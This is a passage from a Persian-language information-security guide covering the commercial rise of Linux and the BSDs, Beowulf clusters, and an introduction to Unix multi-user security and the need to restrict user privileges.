‫ﺩﺭ ﻫﻤﻴﻦ ﺍﺛﻨﺎ ﺩﺭ ﻣﻴﺎﻥ ﺍﻓﺮﺍﺩﻱ ﻛﻪ ﺑﺮﺍﻱ ﻛﺎﻣﭙﻴﻮﺗﺮﻫﺎﻱ ﺷﺨﺼﻲ ﺧﻮﺩ ﺑﻪ ﺩﻧﺒﺎﻝ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﺟﺎﻳﮕﺰﻳﻦ ﺑﻮﺩﻧﺪ ‪ Linux‬ﺑﺴﻴﺎﺭ ﻣﺘـﺪﺍﻭﻝ ﺷـﺪ‪.‬‬
‫ﮔﺮﭼﻪ ‪ OpenBSD‬ﻳﻚ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﻧﺴﺒﺘﹰﺎ ﺍﻳﻤﻦﺗﺮ ﻭ ﭘﺎﻳﺪﺍﺭﺗﺮ ﺑﻮﺩ‪ ،‬ﺍﻣﺎ ‪ Linux‬ﺍﺯ ﺳﺨﺖﺍﻓﺰﺍﺭﻫﺎﻱ ﺑﺴﻴﺎﺭ ﻣﺘﻨﻮﻉﺗﺮﻱ ﭘﺸﺘﻴﺒﺎﻧﻲ ﻣﻲﻛـﺮﺩ‬
‫ﻭ ﻫﻤﭽﻨﻴﻦ ﻣﺮﺍﺣﻞ ﻧﺼﺐ ﻭ ﻛﺎﺭﻛﺮﺩﻥ ﺑﺎ ﺁﻥ ﺗﺎ ﺣﺪﻭﺩﻱ ﺁﺳﺎﻧﺘﺮ ﺑﻮﺩ‪.‬‬
‫ﻫﻤﺔ ﺍﻳﻦ ﻋﻼﻳﻖ ﺯﻣﺎﻧﻴﻜﻪ ﺑﺎ ﻣﺸﻜﻼﺕ ﻓﺰﺍﻳﻨﺪﻩ ﺑﺎﺯﺍﺭ ﺍﻧﺤﺼﺎﺭﻱ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ‪ Microsoft‬ﺩﺭ ﻫـﻢ ﺁﻣﻴﺨـﺖ‪ ،‬ﺗﻮﺟـﻪ ﺩﻭ ﺷـﺮﻛﺖ ‪ IBM‬ﻭ‬
‫‪ Dell‬ﻛﻪ ﻫﺮ ﺩﻭ ﺍﺯ ‪ Linux‬ﺍﻋﻼﻡ ﺣﻤﺎﻳﺖ ﺗﺠﺎﺭﻱ ﻛﺮﺩﻩ ﺑﻮﺩﻧﺪ ﺭﺍ ﺟﻠﺐ ﻛﺮﺩ‪ .‬ﺩﺭ ﻫﻤﻴﻦ ﺍﻳﺎﻡ ﺩﻭ ﺷﺮﻛﺘﻲ ﻛﻪ ﺗﻨﻬﺎ ﺑﻪ ﺳﻴﺴﺘﻢﻋﺎﻣـﻞ ‪Linux‬‬
‫ﻣﻲﭘﺮﺩﺍﺧﺘﻨﺪ ‪ Redhat -‬ﻭ ‪ - VA Linux‬ﺩﻭ ﻓﻘﺮﻩ ﺍﺯ ﻣﻮﻓﻖﺗﺮﻳﻦ ﭘﻴﺸﻨﻬﺎﺩﺍﺕ ﺍﻭﻟﻴﺔ ﻣﺮﺩﻣﻲ ﺩﺭ ﺗﺎﺭﻳﺦ ﺑـﻮﺭﺱ ﺳـﻬﺎﻡ ﺍﻳﺎﻟـﺖ ﻣﺘﺤـﺪﻩ ﺭﺍ‬
‫ﻧﺼﻴﺐ ﺧﻮﺩ ﻛﺮﺩﻧﺪ‪ .‬ﻣﺪﺕ ﻛﻮﺗﺎﻫﻲ ﭘﺲ ﺍﺯ ﺁﻥ ‪ HP‬ﺍﻋﻼﻡ ﻛﺮﺩ ﻳﻚ ﻧﺴﺨﻪ ﺍﺯ ‪ Linux‬ﺭﺍ ﺩﺭ ﺳﻴﺴﺘﻤﻬﺎﻳﺶ ﭘﺸﺘﻴﺒﺎﻧﻲ ﻣﻲﻛﻨﺪ‪.‬‬
‫‪Bill Jolitz‬‬
‫‪25‬‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‬
‫ﺗﺄﺛﻴﺮﺍﺕ ﻛﻠﻴﺪﻱ ﺩﻳﮕﺮ ﺩﺭ ﻧﻴﻤﺔ ﺩﻭﻡ ﺩﻫﺔ ‪ ۱۹۹۰‬ﺯﻣﺎﻧﻲ ﺍﺗﻔـﺎﻕ ﺍﻓﺘـﺎﺩ ﻛـﻪ ﻣﺤﻘﻘـﺎﻥ ﺩﺭ ﺁﺯﻣﺎﻳـﺸﮕﺎﻫﻬﺎﻱ ﻣﻠـﻲ ﻣﺨﺘﻠـﻒ‪ ،‬ﺩﺭ ﺩﺍﻧـﺸﮕﺎﻫﻬﺎ ﻭ‬
‫ﻫﻤﭽﻨﻴﻦ ﺩﺭ ‪ NASA‬ﻛﺎﺭ ﺑﺎ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺧﻮﺷﻪﺑﻨﺪﻱﺷﺪﻩ ﺭﺍ ﺷﺮﻭﻉ ﻛﺮﺩﻧﺪ‪ .‬ﺩﺭ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺧﻮﺷﻪﺑﻨﺪﻱﺷـﺪﻩ ﺻـﺪﻫﺎ ﺭﺍﻳﺎﻧـﺔ ﺷﺨـﺼﻲ ﺗﻬﻴـﻪ‬
‫ﻣﻲﺷﻮﻧﺪ‪ ،‬ﺩﺭ ﻗﻔﺴﻪﻫﺎ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﻧﺪ‪ ،‬ﻭ ﺑﻪ ﺷﺒﻜﻪﻫﺎﻱ ﺑﺎ ﺳﺮﻋﺖ ﺑﺎﻻ ﻣﺘﺼﻞ ﻣﻲﮔﺮﺩﻧﺪ‪ .‬ﺩﺭ ﺍﻳﻦ ﺳﻴﺴﺘﻤﻬﺎ ﻣـﺴﺎﺋﻞ ﺑـﺰﺭﮒ ﺑﺠـﺎﻱ ﺍﺟـﺮﺍﻱ‬
‫ﺧﻴﻠﻲ ﺳﺮﻳﻊ ﺭﻭﻱ ﻳﻚ ﺭﺍﻳﺎﻧﻪ‪ ،‬ﺑﻪ ﭼﻨﺪ ﻗﺴﻤﺖ ﻗﺎﺑﻞ ﻣﺪﻳﺮﻳﺖ ﺗﻘﺴﻴﻢ ﻣﻲﺷـﻮﻧﺪ ﻭ ﺑـﺼﻮﺭﺕ ﻣـﻮﺍﺯﻱ ﺭﻭﻱ ﺭﺍﻳﺎﻧـﻪﻫـﺎﻱ ﻛﻨـﺎﺭ ﻫـﻢ ﺗﺤﻠﻴـﻞ‬
‫ﻣﻲﮔﺮﺩﻧﺪ‪ .‬ﺍﻳﻦ ﺭﻭﺵ ﺍﮔﺮﭼﻪ ﺑﺮﺍﻱ ﻫﻤﺔ ﻣﺴﺎﺋﻞ ﻗﺎﺑﻞ ﻛﺎﺭﺑﺮﺩ ﻧﺒﻮﺩ‪ ،‬ﺍﻣﺎ ﻏﺎﻟﺒﹰﺎ ﺑﻬﺘﺮ ﺍﺯ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺍﺑﺮﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﻣﻨﻔﺮﺩ ﺟﻮﺍﺏ ﻣﻲﺩﺍﺩ ﻭ ﻋـﻼﻭﻩ‬
‫ﺑﺮ ﺁﻥ ﻫﺰﻳﻨﺔ ﺑﺴﻴﺎﺭ ﻛﻤﺘﺮﻱ ﺻﺮﻑ ﺁﻥ ﻣﻲﺷﺪ‪ .‬ﻳﻜﻲ ﺍﺯ ﺍﻭﻟﻴﻦ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻋﻤﻠﻴﺎﺗﻲ ﻛﻪ ﺍﺯ ﺍﻳﻦ ﻧﻮﻉ ﺑﻮﺩ ﻭ ‪ Beowulf‬ﻧﺎﻡ ﺩﺍﺷﺖ‪ ،‬ﻣﺒﺘﻨﻲ ﺑﺮ‬
‫‪ Linux‬ﺑﻮﺩ‪ .‬ﺑﻪ ﺩﻟﻴﻞ ﺑﻪ ﺍﺷﺘﺮﺍﻙ ﮔﺬﺍﺷﺘﻪﺷﺪﻥ ﺍﻳﻦ ﺑﺮﻧﺎﻣﻪ ﻭ ﺗﻮﺳﻌﺔ ﻫﻤﻪﺟﺎﻧﺒﻪ ﺁﻥ ﺗﻮﺳﻂ ﺟﺎﻣﻌﺔ ﺍﺑﺮﺭﺍﻳﺎﻧﻪﺍﻱ‪ Linux ،‬ﺑـﻪ ﺳـﺮﻋﺖ ﻣﻴـﺎﻥ‬
‫ﺳﺎﻳﺮ ﮔﺮﻭﻫﻬﺎﻱ ﺳﺮﺍﺳﺮ ﺟﻬﺎﻥ ﻛﻪ ﻣﺎﻳﻞ ﺑﻮﺩﻧﺪ ﻛﺎﺭﻱ ﻣﺸﺎﺑﻪ ﺍﻧﺠﺎﻡ ﺩﻫﻨﺪ ﭘﺨﺶ ﺷﺪ‪.‬‬
‫‪٢٦٢‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬
‫ﺍﻣﺮﻭﺯﻩ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻣﺸﺎﻏﻞ ﻭ ﺁﺯﻣﺎﻳﺸﮕﺎﻫﻬﺎﻱ ﺗﺤﻘﻴﻘﺎﺗﻲ ﺑﺎ ‪ Linux‬ﻛﺎﺭ ﻣﻲﻛﻨﻨﺪ‪ .‬ﺁﻧﻬﺎ ﺍﺯ ‪ Linux‬ﺑﺮﺍﻱ ﺍﺟﺮﺍﻱ ﺳـﺮﻭﻳﺲﺩﻫﻨـﺪﻩﻫـﺎﻱ ﻭﺏ‪،‬‬
‫ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ‪ ،‬ﻭ ﺩﺭ ﻭﺳﻌﺖ ﻛﻤﺘﺮ ﺑﻌﻨﻮﺍﻥ ﻳﻚ ﺑﺴﺘﺮ ﻋﻤﻮﻣﻲ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺭﻭﻣﻴﺰﻱ ﺍﺳـﺘﻔﺎﺩﻩ ﻣـﻲﻧﻤﺎﻳﻨـﺪ‪ .‬ﻣـﺸﺎﻏﻞ‬
‫ﺑﺠﺎﻱ ﺧﺮﻳﺪ ﺍﺑﺮﺭﺍﻳﺎﻧﻪﻫﺎ‪ ،‬ﺧﻮﺷﻪﻫﺎﻱ ﺑﺰﺭﮒ ‪ Linux‬ﺭﺍ ‪ -‬ﻛﻪ ﻣﻲﺗﻮﺍﻧﻨﺪ ﻣﺴﺎﺋﻞ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺑﺰﺭﮒ ﺭﺍ ﺍﺯ ﻃﺮﻳﻖ ﺍﺟـﺮﺍﻱ ﻣـﻮﺍﺯﻱ ﺣـﻞ ﻛﻨﻨـﺪ ‪-‬‬
‫ﭘﺪﻳﺪ ﻣﻲﺁﻭﺭﻧﺪ‪ .‬ﺑﻪ ﻃﻮﺭ ﻣﺸﺎﺑﻪ ‪ ،NetBSD ،FreeBSD‬ﻭ ‪ OpenBSD‬ﺑﺨﻮﺑﻲ ﻣﻨﺎﺳﺐ ﺍﻳﻦ ﻛﺎﺭﺑﺮﺩﻫـﺎ ﻫـﺴﺘﻨﺪ ﻭ ﺑـﻪ ﻣﻴـﺰﺍﻥ ﻭﺳـﻴﻊ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷﻮﻧﺪ‪ .‬ﺑﺎ ﺍﻳﻨﺤﺎﻝ ﺑﺮﺍﺳﺎﺱ ﺷﻮﺍﻫﺪ ﻏﻴﺮ ﺭﺳﻤﻲ ﺑﻨﻈﺮ ﻣﻲﺭﺳﺪ ‪ Linux‬ﻧﺴﺒﺖ ﺑﻪ ﻫﺮ ﺳﻴـﺴﺘﻢ ﺩﻳﮕـﺮ‪ ،‬ﺭﺷـﺪ ﻛـﺎﺭﺑﺮﺍﻥ ﺑﻴـﺸﺘﺮﻱ‬
‫ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ‪ .‬ﻃﺒﻖ ﭘﺸﺘﻴﺒﺎﻧﻲ ﺍﻋﻼﻡﺷﺪﺓ ﺗﺠﺎﺭﻱ ﺍﺯ ﺟﻤﻠﻪ ﺭﻳﺴﻜﻬﺎﻱ ﺍﻋﻼﻡﺷﺪﻩ ﺗﻮﺳﻂ ﺷﺮﻛﺖ ‪ ،Sun Microsystems‬ﺑﻨﻈﺮ ﻣـﻲﺭﺳـﺪ‬
‫‪ Linux‬ﻣﻮﺍﺯﻧﺔ ﺭﺷﺪ ﺑﻬﺘﺮﻱ ﺩﺭ ﺑﺎﺯﺍﺭ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ‪ .‬ﺑﺎ ﺍﻳﻨﺤﺎﻝ‪ ،‬ﺣﺪﺍﻗﻞ ﺑﻪ ﺩﻟﻴﻞ ﻣﺴﺎﺋﻞ ﻣﺮﺑﻮﻁ ﺑﻪ ﺍﻣﻨﻴﺖ ﻭ ﻛﺎﺭﺍﻳﻲ‪ ،‬ﻣﺎ ﺍﺯ ﮔﻮﻧـﻪﻫـﺎﻱ ﺩﻳﮕـﺮ‬
‫‪BSD‬ﻫﺎ ﺍﻧﺘﻈﺎﺭ ﻣﺤﻮ ﺷﺪﻥ ﻧﺪﺍﺭﻳﻢ؛ ﺯﻳﺮﺍ ﻋﻠﻴﺮﻏﻢ ﺍﻳﻨﻜﻪ ﮔﺮﻭﻩﻫﺎﻱ ‪BSD‬ﻫﺎ ﺑﻪ ﺣﻴﺎﺕ ﺟﺪﺍﮔﺎﻧﺔ ﺧﻮﺩ ﺍﺩﺍﻣﻪ ﻣﻲﺩﻫﻨﺪ‪ ،‬ﺑﻨﻈﺮ ﻧﻤﻲﺭﺳﺪ ﻛـﻪ ﺍﺯ‬
‫ﺳﻬﻢ ﺑﺎﺯﺍﺭ ‪ Linux‬ﺑﻬﺮﻩﺍﻱ ﺑﮕﻴﺮﻧﺪ‪.‬‬
‫ﻧﺴﺨﻪﻫﺎﻱ ﻣﺘﻌﺪﺩﻱ ﺍﺯ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ‪ Linux‬ﻭ ‪ BSD‬ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﺗﻨﻬﺎ ﺑﺎ ﻳﻚ ﻓﻼﭘﻲ ﺳﻴﺴﺘﻢ ﺭﺍ ﺭﺍﻩﺍﻧﺪﺍﺯﻱ ﻣﻲﻛﻨﻨﺪ‪ .‬ﺍﻳﻦ ﻧﺴﺨﻪﻫﺎ ﻛﻪ‬
‫ﺷﺎﻣﻞ ‪ picoBSD ،Trinix‬ﻭ ‪ closedBSD‬ﻫﺴﺘﻨﺪ ﺑﺮﺍﻱ ﻛﺎﺭﺑﺮﺩﻫﺎﻳﻲ ﻃﺮﺍﺣﻲ ﺷﺪﻩﺍﻧﺪ ﻛﻪ ﺩﺭ ﺁﻧﻬﺎ ﺍﻣﻨﻴﺖ ﺯﻳـﺎﺩ ﻻﺯﻡ ﺍﺳـﺖ‪ ،‬ﺍﺯ ﺟﻤﻠـﻪ‬
‫ﻛﺎﺭﺑﺮﺩﻫﺎﻱ ﻗﺎﻧﻮﻧﻲ‪ ،‬ﺗﺮﻣﻴﻢ‪ ،‬ﻭ ﻟﻮﺍﺯﻡ ﺷﺒﻜﻪ‪.‬‬
‫ﺍﻣﻨﻴﺖ ﻭ ‪Unix‬‬
‫ﻫﻤﺎﻧﻨﺪ ﺳﻴـﺴﺘﻤﻬﺎﻳﻲ ﻛـﻪ ﺍﺳـﺎﺱ ﺁﻧﻬـﺎ ﺑـﺮ ﭘﺎﻳـﺔ ‪ Microsoft Windows NT‬ﺍﺳـﺖ‪ Unix ،‬ﻳـﻚ ﺳﻴـﺴﺘﻢﻋﺎﻣـﻞ ﭼﻨـﺪﻛﺎﺭﺑﺮﻩ‪ ٢٦‬ﻭ‬
‫ﭼﻨﺪﻭﻇﻴﻔﻪﺍﻱ‪ ٢٧‬ﺍﺳﺖ‪ .‬ﻣﻨﻈﻮﺭ ﺍﺯ ﭼﻨﺪﻛﺎﺭﺑﺮﻩ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﺍﺟﺎﺯﻩ ﻣﻲﺩﻫﺪ ﺩﺭ ﻳﻚ ﺯﻣﺎﻥ ﺍﻓﺮﺍﺩ ﻣﺘﻔﺎﻭﺕ ﺍﺯ ﺭﺍﻳﺎﻧﻪ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻨـﺪ‪.‬‬
‫ﭼﻨﺪﻭﻇﻴﻔﻪﺍﻱ ﻧﻴﺰ ﺑﻪ ﺍﻳﻦ ﻣﻌﻨﻲ ﺍﺳﺖ ﻛﻪ ﻫﺮ ﻛﺎﺭﺑﺮ ﻣﻲﺗﻮﺍﻧﺪ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻣﺨﺘﻠﻔﻲ ﺭﺍ ﺑﺼﻮﺭﺕ ﻫﻤﺰﻣﺎﻥ ﺑﻪ ﺍﺟﺮﺍ ﺩﺭﺁﻭﺭﺩ‪ .‬ﻳﻜـﻲ ﺍﺯ ﻗﺎﺑﻠﻴﺘﻬـﺎﻱ‬
‫ﻃﺒﻴﻌﻲ ﭼﻨﻴﻦ ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻲ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﺍﺯ ﺗﺪﺍﺧﻞ ﻛﺎﺭ ﭼﻨﺪ ﻧﻔﺮ )ﻳﺎ ﭼﻨﺪ ﺑﺮﻧﺎﻣﻪ( ﻣﺨﺘﻠـﻒ ﻛـﻪ ﺍﺯ ﻳـﻚ ﺳﻴـﺴﺘﻢ ﺑﻄـﻮﺭ ﻫﻤﺰﻣـﺎﻥ ﺍﺳـﺘﻔﺎﺩﻩ‬
‫ﻣﻲﻛﻨﻨﺪ ﺟﻠﻮﮔﻴﺮﻱ ﻛﻨﺪ‪ .‬ﺑﺪﻭﻥ ﻭﺟﻮﺩ ﭼﻨﻴﻦ ﺣﻔﺎﻇﺘﻲ ﻳﻚ ﺑﺮﻧﺎﻣﻪ ﺧﻮﺩﺳﺮ ﻣﻤﻜﻦ ﺍﺳﺖ ﺳﺎﻳﺮ ﺑﺮﻧﺎﻣﻪﻫﺎ ﻳﺎ ﻛﺎﺭﺑﺮﺍﻥ ﺭﺍ ﺗﺤﺖ ﺗﺄﺛﻴﺮ ﻗﺮﺍﺭ ﺩﻫـﺪ‪،‬‬
‫ﻣﻤﻜﻦ ﺍﺳﺖ ﻓﺎﻳﻠﻬﺎ ﺭﺍ ﺑﻄﻮﺭ ﺗﺼﺎﺩﻓﻲ ﭘﺎﻙ ﻛﻨﺪ‪ ،‬ﻳﺎ ﻣﻤﻜﻦ ﺍﺳﺖ ﻛﻞ ﻛﺎﺭ ﺳﻴﺴﺘﻢ ﺭﺍﻳﺎﻧﻪ ﺭﺍ ﻣﺨﺘﻞ ﻧﻤﺎﻳﺪ‪ .‬ﺑﺮﺍﻱ ﺟﻠـﻮﮔﻴﺮﻱ ﺍﺯ ﻭﻗـﻮﻉ ﭼﻨـﻴﻦ‬
‫ﺳﻮﺍﻧﺤﻲ‪ ،‬ﻧﻮﻋﻲ ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻫﻤﻮﺍﺭﻩ ﺩﺭ ﻓﻠﺴﻔﻪ ﻃﺮﺍﺣﻲ ‪ Unix‬ﺟﺎﻳﻲ ﺩﺍﺷﺘﻪ ﺍﺳﺖ‪.‬‬
‫ﺍﻣﻨﻴﺖ ‪ Unix‬ﺗﺴﻬﻴﻼﺗﻲ ﺑﻴﺶ ﺍﺯ ﺣﻔﺎﻇﺖ ﺻﺮﻑ ﺍﺯ ﺣﺎﻓﻈﻪ ﻓﺮﺍﻫﻢ ﻣﻲﻛﻨﺪ‪ Unix .‬ﺩﺍﺭﺍﻱ ﻳﻚ ﺳﻴﺴﺘﻢ ﺍﻣﻨﻴﺘﻲ ﻣﺠﻬﺰ ﺍﺳﺖ ﻛـﻪ ﺭﺍﻫﻬـﺎﻳﻲ‬
‫ﻛﻪ ﻛﺎﺭﺑﺮﺍﻥ ﺑﻪ ﻓﺎﻳﻠﻬﺎ ﺩﺳﺘﺮﺳﻲ ﭘﻴﺪﺍ ﻣﻲﻛﻨﻨﺪ‪ ،‬ﭘﺎﻳﮕﺎﻩ ﺩﺍﺩﻩﻫﺎﻱ ﺳﻴﺴﺘﻢ ﺭﺍ ﺗﻐﻴﻴﺮ ﻣﻲﺩﻫﻨﺪ‪ ،‬ﻭ ﺍﺯ ﻣﻨﺎﺑﻊ ﺳﻴﺴﺘﻢ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻨـﺪ ﺭﺍ ﻛﻨﺘـﺮﻝ‬
‫ﻣﻲﻛﻨﺪ‪ .‬ﻣﺘﺄﺳﻔﺎﻧﻪ ﺯﻣﺎﻧﻴﻜﻪ ﺳﻴﺴﺘﻢ ﺩﺭﺳﺖ ﭘﻴﻜﺮﺑﻨﺪﻱ ﻧﺸﺪﻩ ﺑﺎﺷﺪ‪ ،‬ﺑﺪﻭﻥ ﺩﻗﺖ ﺍﺳﺘﻔﺎﺩﻩ ﺷﻮﺩ‪ ،‬ﻳﺎ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﻛﻪ ﺩﺍﺭﺍﻱ ﺍﺷﻜﺎﻝ ﺍﺳﺖ ﺩﺍﺷـﺘﻪ‬
‫ﺑﺎﺷﺪ‪ ،‬ﺍﻳﻦ ﻣﻜﺎﻧﻴﺰﻣﻬﺎ ﻛﻤﻚ ﭼﻨﺪﺍﻧﻲ ﻧﻤﻲﻛﻨﻨﺪ‪ .‬ﺗﻘﺮﻳﺒﹰﺎ ﺗﻤﺎﻡ ﺣﻔﺮﻩﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﻛﻪ ﻃﻲ ﺳﺎﻟﻬﺎﻱ ﻣﺘﻤﺎﺩﻱ ﺩﺭ ‪ Unix‬ﭘﻴﺪﺍ ﺷﺪﻩﺍﻧـﺪ ﺭﻳـﺸﻪ ﺩﺭ‬
‫ﺍﻳﻨﮕﻮﻧﻪ ﻣﺴﺎﺋﻞ ﺩﺍﺷﺘﻪﺍﻧﺪ ﺗﺎ ﻧﺎﺭﺳﺎﻳﻲﻫﺎﻱ ﻃﺮﺍﺣﻲ ﺩﺭﻭﻧﻲ ﺳﻴﺴﺘﻢ‪ .‬ﺑﻨﺎﺑﺮﺍﻳﻦ ﺗﻘﺮﻳﺒﹰﺎ ﻫﻤﺔ ﻓﺮﻭﺷﻨﺪﮔﺎﻥ ‪ Unix‬ﻣﻌﺘﻘﺪﻧﺪ ﻛـﻪ ﻣـﻲﺗﻮﺍﻧﻨـﺪ ﻳـﻚ‬
‫ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﻧﺴﺒﺘﹰﺎ ﻣﻄﻤﺌﻦ ﺭﺍ ﺍﺭﺍﺋﻪ ﺩﻫﻨﺪ‪ .‬ﻣﺎ ﻣﻌﺘﻘﺪﻳﻢ ﻛﻪ ﺳﻴﺴﺘﻤﻬﺎﻱ ‪ Unix‬ﻣﻲﺗﻮﺍﻧﻨﺪ ﺍﺯ ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬﺎﻱ ﺩﻳﮕﺮ ﺑﺴﻴﺎﺭ ﺍﻳﻤﻦﺗـﺮ ﺑﺎﺷـﻨﺪ‪،‬‬
‫ﺍﻣﺎ ﺑﺎ ﺍﻳﻨﺤﺎﻝ ﻣﺴﺎﺋﻠﻲ ﻫﺴﺘﻨﺪ ﻛﻪ ﻋﻠﻴﻪ ﺍﻣﻨﻴﺖ ﺑﻴﺸﺘﺮ ﺩﺭ ﺍﻳﻦ ﻣﺤﻴﻂ ﺗﺄﺛﻴﺮﮔﺬﺍﺭﻱ ﻣﻲﻛﻨﻨﺪ‪.‬‬
‫ﺍﻧﺘﻈﺎﺭﺍﺕ ﻭ ﺍﻣﻴﺪﻭﺍﺭﻳﻬﺎ‬
‫ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻛﺎﺭﺑﺮﺍﻥ ﺍﻳﻨﻄﻮﺭ ﺑﺎﺭ ﺁﻣﺪﻩﺍﻧﺪ ﻛﻪ ‪ Unix‬ﺭﺍ ﺑﺎ ﭘﻴﻜﺮﺑﻨﺪﻱ ﺧﺎﺻﻲ ﺑﺒﻴﻨﻨﺪ‪ .‬ﺗﺠﺮﺑﺔ ﺁﻧﻬﺎ ﺍﺯ ‪ Unix‬ﺩﺭ ﻛﺎﺭﻫـﺎﻱ ﻋﻠﻤـﻲ‪ ،‬ﺳـﺮﮔﺮﻣﻲ‪ ،‬ﻭ‬
‫ﺗﺤﻘﻴﻘﺎﺗﻲ‪ ،‬ﻫﻤﻴﺸﻪ ﺍﻳﻨﻄﻮﺭ ﺑﻮﺩﻩ ﺍﺳﺖ ﻛﻪ ﺩﺭ ﺳﻴﺴﺘﻢ ﺑﻪ ﻫﻤﺔ ﺷﺎﺧﻪﻫﺎ ﻭ ﺍﻏﻠﺐ ﻓﺮﺍﻣﻴﻦ ﺩﺳﺘﺮﺳﻲ ﺩﺍﺷﺘﻪﺍﻧﺪ‪ .‬ﻛـﺎﺭﺑﺮﺍﻥ ﺷـﺎﻳﺪ ﻋـﺎﺩﺕ ﻛـﺮﺩﻩ‬
‫ﺑﺎﺷﻨﺪ ﻛﻪ ﻓﺎﻳﻠﻬﺎﻳﺸﺎﻥ ﺩﺭ ﺣﺎﻟﺖ ﭘﻴﺶﻓﺮﺽ ﺑﺮﺍﻱ ﻋﻤﻮﻡ ﻗﺎﺑﻞ ﺧﻮﺍﻧﺪﻥ ﺑﺎﺷﻨﺪ‪ .‬ﻛﺎﺭﺑﺮﺍﻥ ﻫﻤﭽﻨﻴﻦ ﻏﺎﻟﺒﹰﺎ ﻋﺎﺩﺕ ﻛﺮﺩﻩﺍﻧﺪ ﻛﻪ ﺑﺘﻮﺍﻧﻨﺪ ﻧﺮﻡﺍﻓـﺰﺍﺭ‬
‫ﻻ ﺩﺳﺘﺮﺳﻲ ﺳﻄﺢ ﺳﻴﺴﺘﻤﻲ )ﺑﺎﻻﺗﺮﻳﻦ ﺳﻄﺢ ﺩﺳﺘﺮﺳـﻲ( ﺑـﺮﺍﻱ ﺍﻧﺠـﺎﻡ ﺁﻥ ﻻﺯﻡ‬
‫ﻣﻮﺭﺩ ﻧﻈﺮ ﺧﻮﺩﺷﺎﻥ ﺭﺍ ﺑﺴﺎﺯﻧﺪ ﻭ ﻧﺼﺐ ﻛﻨﻨﺪ؛ ﻛﺎﺭﻱ ﻛﻪ ﻣﻌﻤﻮ ﹰ‬
‫ﺍﺳﺖ‪.‬‬
‫‪Multi User‬‬
‫‪Multitask‬‬
‫‪26‬‬
‫‪27‬‬
‫‪٢٦٣‬‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ‬
‫ﻣﺘﺄﺳﻔﺎﻧﻪ ﻫﻤﺔ ﺍﻳﻦ ﺍﻧﺘﻈﺎﺭﺍﺕ ﺧﻼﻑ ﻳﻚ ﻣﻨﺶ ﺧﻮﺏ ﺍﻣﻨﻴﺘﻲ ﺍﺳﺖ‪ .‬ﺑﺮﺍﻱ ﺍﻳﻨﻜﻪ ﺍﻣﻨﻴـﺖ ﻗـﻮﻱﺗـﺮ ﺩﺍﺷـﺘﻪ ﺑﺎﺷـﻴﻢ ﻻﺯﻡ ﺍﺳـﺖ ﻣـﺪﻳﺮﺍﻥ ﻭ‬
‫ﺭﺍﻫﺒﺮﺍﻥ ﺳﻴﺴﺘﻤﻬﺎ ﮔﻬﮕﺎﻩ ﺍﻣﺘﻴﺎﺯﺍﺕ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﻓﺎﻳﻠﻬﺎ ﻭ ﻓﺮﺍﻣﻴﻨﻲ ﻛﻪ ﭼﻨﺪﺍﻥ ﻣﻮﺭﺩ ﻧﻴﺎﺯ ﻛﺎﺭﺑﺮﺍﻥ ﺩﺭ ﺍﻧﺠﺎﻡ ﻭﻇﺎﻳﻔـﺸﺎﻥ ﻧﻴـﺴﺘﻨﺪ ﺭﺍ ﻣﺤـﺪﻭﺩ‬
‫ﮐﻨﻨﺪ‪ .‬ﺑﺮ ﺍﻳﻦ ﺍﺳﺎﺱ ﻛﺴﻲ ﻛﻪ ﺑﺮﺍﻱ ﺍﻧﺠﺎﻡ ﻛﺎﺭﺵ ﺑﻪ ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻭ ﭘﺮﺩﺍﺯﺷﮕﺮ ﻣﺘﻨﻲ ﻧﻴﺎﺯ ﺩﺍﺭﺩ ﻻﺯﻡ ﻧﻴﺴﺖ ﺍﻧﺘﻈﺎﺭ ﺩﺍﺷﺘﻪ ﺑﺎﺷـﺪ ﻛـﻪ‬
